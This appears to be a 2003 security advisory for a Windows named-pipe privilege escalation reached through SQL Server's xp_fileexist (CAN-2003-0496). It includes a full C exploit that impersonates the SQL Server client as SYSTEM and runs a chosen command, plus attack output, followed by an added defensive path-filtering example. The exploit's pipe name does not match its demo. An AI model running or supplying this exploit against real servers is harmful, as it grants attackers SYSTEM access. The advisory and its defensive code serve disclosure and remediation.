Microsoft Windows CreateFile API Named Pipe Privilege Escalation Vulnerability

Published: 2003-07-08
Updated: 2003-07-15
Severity: High
Threat level: Local administrator privileges
Error type: Design error
Exploitation: Server mode
BUGTRAQ ID: 8128
CVE(CAN) ID: CAN-2003-0496

Affected systems
Microsoft Windows 2000 Advanced Server SP3

Unaffected systems
Microsoft Windows 2000 Advanced Server SP4

Description
Microsoft Windows does not correctly handle named pipes opened through the CreateFile API. When such a named pipe is passed as the argument to SQL Server's xp_fileexist stored procedure, an attacker can execute arbitrary commands with the privileges of the SQL Server process.

Test code
C:\>mssqlpipe.exe cmd.exe
Creating pipe: \\.\Pipe\atstake
Pipe created, waiting for connectection

Connect to the database (with isql for example) and execute:
xp_fileexist '\\SERVERNAME\pipe\atsstake'

Then in command shell #2:

C:\>isql -U andreas
Password:
1> xp_fileexist '\\TEMP123\pipe\atstake'
2> go
File Exists File is a Directory Parent Directory Exists
----------- ------------------- -----------------------
1           0                   1

Then, back in command shell #1:

Impersonate user successful, we are running as user: SYSTEM

/* tac0tac0.c - pay no attention to the name, long story...
 *
 * Author: Maceo
 * Modified to take advantage of CAN-2003-0496 Named Pipe Filename
 * Local Privilege Escalation Found by @stake. Use with their Advisory.
 * -wirepair@sh0dan.org http://sh0dan.org
 *
 * All credits for code go to Maceo, i really did minimal work
 * with his code, it took me like 3 seconds heh.
 * Shouts to #innercircle,
 */
#include <stdio.h>
#include <stdlib.h>    /* exit(), system() */
#include <windows.h>

int main(int argc, char **argv)
{
    DWORD dwNumber = 0;
    DWORD dwSize = sizeof(DWORD);

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local Priv Escalation found by @stake.\n"
                        "This code is to be used with MS-SQL exactly as outlined in their advisory\n"
                        "All credit for this code goes to Maceo, he did a fine job.. -wire\n", argv[0]);
        exit(1);
    }

    // build the named pipe name; the server end is created in the local pipe namespace
    char szPipe[64];
    //sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", ++dwNumber);
    sprintf(szPipe, "\\\\.\\pipe\\poop");

    // create the named pipe before scm can
    HANDLE hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
                                   2, 0, 0, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create named pipe:\n %s\n", szPipe);
        return 3;
    }

    // block until a client (the SQL Server process calling xp_fileexist) opens the pipe
    ConnectNamedPipe(hPipe, NULL);

    // assume the identity of the client
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
    }

    // display impersonated user's name
    dwSize = 256;
    char szUser[256];
    GetUserName(szUser, &dwSize);
    printf("Impersonating: %s\n", szUser);

    // run the requested command under the impersonated token
    system(argv[1]);

    CloseHandle(hPipe);
    return 0;
}

Solution
The vendor has fixed this vulnerability in the latest service pack:

Microsoft Windows 2000 Server SP3:
Microsoft Upgrade Windows 2000 SP4
http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp

Related information
Named Pipe Filename Local Privilege Escalation
http://www.atstake.com/research/advisories/2003/a070803-1.txt
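As an added defensive example (not part of this advisory or of the @stake/Maceo code): any service that opens a caller-supplied path, as xp_fileexist does, has to assume the path may name a pipe whose server end can impersonate the opener. The function names is_pipe_path and open_untrusted_path are this example's own; the pre-filter is portable C, while the CreateFileA call with SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION is the part that actually caps the impersonation level and only compiles on Windows.

```c
/* Added example, not from the advisory or the @stake/Maceo tool.
 * Defensive side of CAN-2003-0496: a path handed to CreateFile may name a
 * pipe, and the pipe's server end can then impersonate the opener at the
 * opener's full privilege (SYSTEM for a SQL Server service). Two layers:
 * a portable pre-filter for the pipe namespace, and (Windows only) an open
 * that caps impersonation at identification level. Names are my own. */
#include <ctype.h>
#include <stdio.h>

/* Case-insensitive match of n chars, treating '/' and '\\' as the same. */
static int seg_eq(const char *s, const char *lit, size_t n) {
    for (size_t i = 0; i < n; i++) {
        char a = s[i] == '/' ? '\\' : s[i];
        if (tolower((unsigned char)a) != tolower((unsigned char)lit[i])) return 0;
    }
    return 1;
}

/* 1 if path addresses the named-pipe namespace in any of its spellings:
 * \\.\pipe\x, \\?\pipe\x, //./pipe/x, \\HOST\pipe\x (case-insensitive). */
int is_pipe_path(const char *path) {
    if (!seg_eq(path, "\\\\", 2)) return 0;            /* UNC or device prefix */
    const char *end = path + 2;                          /* host, '.' or '?' */
    while (*end && *end != '\\' && *end != '/') end++;
    if (end == path + 2 || *end == '\0') return 0;
    return seg_eq(end, "\\pipe\\", 6);
}

#ifdef _WIN32
#include <windows.h>
/* Open a caller-supplied path for reading. SECURITY_IDENTIFICATION lets a
 * pipe server learn who we are but not act as us; a handle that still
 * turns out to be a pipe is refused outright. */
HANDLE open_untrusted_path(const char *path) {
    if (is_pipe_path(path)) return INVALID_HANDLE_VALUE;
    HANDLE h = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
                           SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, NULL);
    if (h != INVALID_HANDLE_VALUE && GetFileType(h) == FILE_TYPE_PIPE) {
        CloseHandle(h);                  /* reached a pipe the filter missed */
        return INVALID_HANDLE_VALUE;
    }
    return h;
}
#endif

int main(void) {
    /* Constructed sample paths; the first two mirror the advisory's names. */
    const char *samples[] = { "\\\\.\\Pipe\\atstake", "\\\\SERVERNAME\\pipe\\atstake",
                              "//./PIPE/x", "C:\\temp\\report.txt", "\\\\fs\\share\\a.txt" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-34s pipe=%d\n", samples[i], is_pipe_path(samples[i]));
    return 0;
}
```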